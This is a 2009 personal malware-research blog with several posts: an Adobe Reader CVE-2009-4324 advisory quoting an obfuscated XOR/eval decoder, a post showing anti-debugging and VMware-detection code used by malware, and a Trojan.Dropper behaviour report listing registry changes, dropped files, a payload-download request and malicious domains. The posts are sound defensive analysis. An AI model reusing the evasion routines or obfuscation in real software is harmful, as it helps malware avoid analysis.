Dec 18, 2009

Adobe new vulnerbility APSA09-07, CVE-2009-4324

Adobe had recently confirmed a critical vulnerability in Adobe Reader and Acrobat 9.2 and earlier versions that could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being actively exploited in the wild.

This vulnerability affects Adobe Reader/Acrobat 9.2 or older. the vulnerability was found in the JavaScript function specific when reading PDF file. Exploits were found in the form of maliciously crafted PDF files.

Exploits Behaviours:
==============
It drops and execute a malicious downloader. This downloader will download more malwares from domain such as foruminspace.com.

Other symptoms such as unexpected network connections from the Adobe Reader and in some cases, Adobe reader may crashes or terminates abnormally.

From my observation, major AV vendors such as Symantec, Sophos, McAfee, TrendMicro had specific signatures for this exploit. Not sure if other AV such as Panda or Kaspersky, which do not have a specific signature, can detect this exploit under their generic signatures. I have requested for a copy of the malware from a McAfee researcher. Hopefully can get it to do a further analysis.

So far the findings from McAfee, the malware uses JavaScript obfuscation to hide the actual exploit code in the malicious PDF.

Example of a sample code that shows the malware using XOR encoder to hide the exploit code.

s1='\x2a\x3d\x3e\x \x31\x \x31\x33\x \x25\x67\x56\x \x35\x3a\x7\x .....';

s2='';
for (i=0; i< s1.length; i++)
{
s2=s2+String.fromCharCode(s1.charCodeAt(i) ^ k);

};

eval(s2);

The patch for this vulnerbility was announced to be release next year, but user can mitigate this problem by disabling JavaScript in Adobe Reader and Acrobat. Please refer to "Disable javascript in Adobe Acrobat" or Adobe security bulletin for the steps.

Nov 4, 2009

Counter malware analysis

As a malware researcher (during leisure), we face a constant challenge from the malware writers trying to outsmart us by using many anti analysis technique in their malware. Deter and confuse researchers from analysing the malware.

These techniques include:
  • Obfuscation/hiding of codes & scripts

  • Obfuscation of script, commonly using "unescape" function and various encoding (e.g Base64) to hide malicious javascript (e.g unescape(dz+cz+op+st)+'dw(dz+cz($+st));')}else{$=''};function sc(cnm,v,ed)). Source codes can be obfuscation using packer such as UPX

  • Encryption of Source code & data

  • Packer (Compressed executable) uses proprietary methods of compression and encryption to hinder malware analysis. Configuration data may also be obfuscated or encrypted.

  • Junk code (useless instructions and rountine)

  • Useless instructions were inserted between real instructions. Jumping into middle of instructions will sometime cause a debugger to halt with error.

  • Detection of analysis tools (virtual system, monitoring tools, debugger)

  • Malware can react differently when analysis tools were detected in the system to fool the analyst. Some sample methods shown below.

  • Conduct integrity checks (Prevent tampering and patching)

  • Malware may contain checksum and protection routine to prevent any tampering to their program.
Below are some sample code used by malware to detect analysis tools.

Detect OllyDbg
The function IsODBGLoaded will return true if debugger is detected

__inline bool IsODBGLoaded() {
char *caption="DAEMON";
_asm {

push 0x00
push caption

mov eax, fs:[30h]
movzx eax, byte ptr[eax+0x2]
or al,al
jz normal_
jmp out_
normal_:

xor eax, eax
leave
ret
out_:

mov eax, 0x1
leave
ret
}
}

Detect VMWare
It checks the version and see if it is running inside the virtual

/* Check VMware version only */

int VMGetVersion() {

unsigned long version, magic, command;
command=VMCMD_GET_VERSION;
VMBackDoor(&version, &magic, &command, NULL);
if(magic==VMWARE_MAGIC) return version;
else return 0;
}
/* Check if running inside VMWare */

int IsVMWare() {

int version=VMGetVersion();
if(version) return true; else return false;
}

Detecting Breakpoints
The function IsBPX checks if the given memory address is a breakpoint.

__inline bool IsBPX(void *address) {

_asm {

mov esi, address
mov al, [esi]
cmp al, 0xCC
je BPXed

xor eax, eax
jmp NOBPX
BPXed:

mov eax, 1
NOBPX:
}
}



Aug 7, 2009

Malware Analysis: Antivirus System PRO

This summary is not available. Please click here to view the post.

Jun 10, 2009

Malware Analysis: Trojan.Dropper

I have receive a suspicious file from my colleague yesterday and done a simple behaviour analysis on it. It seems to be a relatively new virus as major AV tools (such as McAfee, TrendMicro, Kaspersky, F-secure..) were not able to detect it.

Analysis Report:
##############

File: 1.exe
Size: 1033728
MD5: 19AB525B9AF6CBB40F428115E8148522
Virus Found: Trojan.Dropper (Symantec), Win32/Heur (AVG), TR/Crypt.FKM.Gen (AntiVir), Mal/EncPk-EE (Sophos)

On the VirusTotal website, only 20 out of 40 AV detected it (details).

VirusTotal site

Summary:
=======
The Trojan will modify the PCIDump service, add several .sys files such as acpiec.sys into your C:\Windows\system32 folder. It will also copy itself and add a autorun.inf to C:\. It will also copy phpi.dll into C:\Windows folder.

It changes the Hosts file and try to connect to www.cvbasefwdase.cn via HTTP to download other files. Likely to be trying to download more malicious payload.

Techincal Details:
################

Registry keys added:
==============
HKLM\SOFTWARE\Microsoft\ESENT\Process\ipconfig
HKLM\SOFTWARE\Microsoft\ESENT\Process\ipconfig\DEBUG
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Control
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Control
HKLM\SYSTEM\ControlSet001\Services\pcidump
HKLM\SYSTEM\ControlSet001\Services\pcidump\Security
HKLM\SYSTEM\ControlSet001\Services\pcidump\Enum
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Security
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Enum
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Control
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Control
HKLM\SYSTEM\CurrentControlSet\Services\pcidump
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Security
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Enum
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Security
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Enum
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell

Registry keys deleted:
==============
HKLM\SYSTEM\ControlSet001\Services\PCIDump
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump

Registry values added:
===============
HKLM\SOFTWARE\Microsoft\ESENT\Process\ipconfig\DEBUG\Trace Level: ""
HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations: 5C 3F 3F 5C 63 3A 5C 77 69 6E 64 6F 77 73 5C 73 79 73 74 65 6D 33 32 5C 64 72 69 76 65 72 73 5C 4F 4C 44 35 2E 74 6D 70 00 00 00
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Control\ActiveService: "pcidump"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Service: "pcidump"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Legacy: 0x00000001
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Class: "LegacyDriver"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\DeviceDesc: "pcidump"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Control\ActiveService: "UPDATEDATA"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Service: "UPDATEDATA"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Legacy: 0x00000001
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Class: "LegacyDriver"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\DeviceDesc: "UPDATEDATA"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
HKLM\SYSTEM\ControlSet001\Services\pcidump\Enum\0: "Root\LEGACY_PCIDUMP\0000"
HKLM\SYSTEM\ControlSet001\Services\pcidump\Enum\Count: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\pcidump\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\pcidump\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\ControlSet001\Services\pcidump\Type: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\pcidump\Start: 0x00000003
HKLM\SYSTEM\ControlSet001\Services\pcidump\ErrorControl: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\pcidump\ImagePath: "System32\DRIVERS\pcidump.sys"
HKLM\SYSTEM\ControlSet001\Services\pcidump\DisplayName: "pcidump"
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Enum\0: "Root\LEGACY_UPDATEDATA\0000"
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Enum\Count: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Type: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Start: 0x00000003
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\ErrorControl: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\ImagePath: "\??\C:\WINDOWS\system32\drivers\acpiec.sys"
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\DisplayName: "UPDATEDATA"
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations: 5C 3F 3F 5C 63 3A 5C 77 69 6E 64 6F 77 73 5C 73 79 73 74 65 6D 33 32 5C 64 72 69 76 65 72 73 5C 4F 4C 44 35 2E 74 6D 70 00 00 00
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Control\ActiveService: "pcidump"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Service: "pcidump"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Legacy: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Class: "LegacyDriver"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\DeviceDesc: "pcidump"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Control\ActiveService: "UPDATEDATA"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Service: "UPDATEDATA"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Legacy: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Class: "LegacyDriver"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\DeviceDesc: "UPDATEDATA"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Enum\0: "Root\LEGACY_PCIDUMP\0000"
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Enum\Count: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Type: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Start: 0x00000003
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\ErrorControl: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\ImagePath: "System32\DRIVERS\pcidump.sys"
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\DisplayName: "pcidump"
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Enum\0: "Root\LEGACY_UPDATEDATA\0000"
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Enum\Count: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Type: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Start: 0x00000003
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\ErrorControl: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\ImagePath: "\??\C:\WINDOWS\system32\drivers\acpiec.sys"
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\DisplayName: "UPDATEDATA"
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\1.rkr: 09 00 00 00 06 00 00 00 F0 8C 78 3B 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\FolderType: "MyDocuments"
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\@shell32.dll,-12691: "My Recent Documents"
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Owner\Desktop\1.exe: "Microsoft ???????"

Registry values deleted:
================
HKLM\SYSTEM\ControlSet001\Services\PCIDump\ErrorControl: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\PCIDump\Group: "PCI Configuration"
HKLM\SYSTEM\ControlSet001\Services\PCIDump\Start: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\PCIDump\Tag: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\PCIDump\Type: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\ErrorControl: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\Group: "PCI Configuration"
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\Start: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\Tag: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\Type: 0x00000001

Registry values modified:
=================
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: C9 5A 15 C4 25 28 78 C3 EA 94 2F FD E9 49 6F 86 00 EA EC 29 33 E7 A4 37 AE D9 53 A6 3F 7C 0F 9B 7C B4 0C C8 B7 B8 C6 6C 07 CD 75 47 55 88 CC E0 E4 31 36 49 C8 36 EC C6 A7 CD 6C 87 BB 2A 41 42 B9 55 42 B9 53 0C FE 7F 17 BA 4B E4 32 E0 33 4D
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 72 0B C5 74 CD 96 F6 DF 3D 2D 96 32 0A 0B CE ED 24 AA AA E6 4B 52 CE B7 C5 99 30 82 1D 4B 31 65 A0 C0 4F 8B B2 E5 FE 0B BE EF A8 61 B8 FD 4B 5C C6 59 F8 9B 2E E8 7C B8 AF 3C EE 3E 34 74 23 78 5D DC 0E E7 05 99 3D D5 4B A3 48 5B 66 6C 8E 38
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000006
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000014
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x00000002
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x0000000A
HKLM\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\EventMessageFile: "c:\windows\system32\ESENT.dll"
HKLM\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\EventMessageFile: "C:\WINDOWS\system32\ESENT.dll"
HKLM\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\CategoryMessageFile: "c:\windows\system32\ESENT.dll"
HKLM\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\CategoryMessageFile: "C:\WINDOWS\system32\ESENT.dll"
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\ESENT\EventMessageFile: "c:\windows\system32\ESENT.dll"
HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\ESENT\EventMessageFile: "C:\WINDOWS\system32\ESENT.dll"
HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\ESENT\CategoryMessageFile: "c:\windows\system32\ESENT.dll"
HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\ESENT\CategoryMessageFile: "C:\WINDOWS\system32\ESENT.dll"
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000001
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 09 00 00 00 61 00 00 00 A0 22 D9 17 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 09 00 00 00 62 00 00 00 20 EB 67 3B 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 09 00 00 00 9E 00 00 00 40 D7 FC 17 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 09 00 00 00 9F 00 00 00 F0 8C 78 3B 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 46 00 00 00 31 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 B0 A8 11 EE B6 52 C9 01 01 00 00 00 C0 A8 EC 80 00 00 00 00 00 00 00 00 00 00 00 00
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 46 00 00 00 32 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 B0 A8 11 EE B6 52 C9 01 01 00 00 00 C0 A8 EC 80 00 00 00 00 00 00 00 00 00 00 00 00
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 00 00 00 00 01 00 00 00 03 00 00 00 07 00 00 00 05 00 00 00 06 00 00 00 04 00 00 00 02 00 00 00 FF FF FF FF
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 05 00 00 00 00 00 00 00 01 00 00 00 03 00 00 00 07 00 00 00 06 00 00 00 04 00 00 00 02 00 00 00 FF FF FF FF
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\Windowplacement: 2C 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF CE 00 00 00 24 00 00 00 26 03 00 00 18 02 00 00
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\Windowplacement: 2C 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF E6 00 00 00 37 00 00 00 3E 03 00 00 2B 02 00 00
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\SymbolWarningShown: 0x00000000
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\SymbolWarningShown: 0x00000001
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\DefaultProcPropPage: 0x00000000
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\DefaultProcPropPage: 0x00000006

Files added:
========
C:\WINDOWS\system32\CatRoot2\tmp.edb
C:\WINDOWS\system32\dllcache\acpiec.sys
C:\WINDOWS\system32\drivers\OLD5.tmp
C:\WINDOWS\system32\drivers\pcidump.sys
C:\WINDOWS\system32\func.dll
C:\WINDOWS\LastGood\system32\drivers\acpiec.sys
C:\WINDOWS\phpi.dll
C:\1.exe
C:\autorun.inf

Files modified:
==========
C:\Documents and Settings\Owner\Cookies\index.dat
C:\Documents and Settings\Owner\Local Settings\History\History.IE5\index.dat
C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\index.dat
C:\Documents and Settings\Owner\ntuser.dat.LOG
C:\WINDOWS\Prefetch\CMD.EXE-087B4001.pf
C:\WINDOWS\setupapi.log
C:\WINDOWS\system32\CatRoot2\edb.chk
C:\WINDOWS\system32\CatRoot2\edb.log
C:\WINDOWS\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb
C:\WINDOWS\system32\config\default.LOG
C:\WINDOWS\system32\config\software.LOG
C:\WINDOWS\system32\config\system.LOG
C:\WINDOWS\system32\drivers\acpiec.sys
C:\WINDOWS\system32\drivers\etc\hosts

Folder added:
=========
C:\WINDOWS\LastGood
C:\WINDOWS\LastGood\system32
C:\WINDOWS\LastGood\system32\drivers

Other behaviours:
============
>System connecting to www.cvbasefwdase.cn:80
The following HTTP request found:
Get /new.txt HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.cvbasefwdase.cn
Connection: Keep-Alive

>System listening on UDP as va9sdhun23.cn:1030

>Running "rundll32.exe" as a process

>Change the hosts file with the following entries:
127.0.0.1 v.onondown.com.cn
127.0.0.2 ymsdasdw1.cn
127.0.0.3 h96b.info
127.0.0.0 fuck.zttwp.cn
127.0.0.0 www.hackerbf.cn
127.0.0.0 geekbyfeng.cn
127.0.0.0 121.14.101.68
127.0.0.0 ppp.etimes888.com
127.0.0.0 www.bypk.com
127.0.0.0 CSC3-2004-crl.verisign.com
127.0.0.1 va9sdhun23.cn
127.0.0.0 udp.hjob123.com
127.0.0.2 bnasnd83nd.cn
127.0.0.0 www.gamehacker.com.cn
127.0.0.0 gamehacker.com.cn
127.0.0.3 adlaji.cn
127.0.0.1 858656.com
127.1.1.1 bnasnd83nd.cn
127.0.0.1 my123.com
127.0.0.0 user1.12-27.net
127.0.0.1 8749.com
127.0.0.0 fengent.cn
127.0.0.1 4199.com
127.0.0.1 user1.16-22.net
127.0.0.1 7379.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
127.0.0.1 7255.com
127.0.0.1 user1.23-12.net
127.0.0.1 3448.com
127.0.0.1 www.guccia.net
127.0.0.1 7939.com
127.0.0.1 a.o1o1o1.nEt
127.0.0.1 8009.com
127.0.0.1 user1.12-73.cn
127.0.0.1 piaoxue.com
127.0.0.1 3n8nlasd.cn
127.0.0.1 kzdh.com
127.0.0.0 www.sony888.cn
127.0.0.1 about.blank.la
127.0.0.0 user1.asp-33.cn
127.0.0.1 6781.com
127.0.0.0 www.netkwek.cn
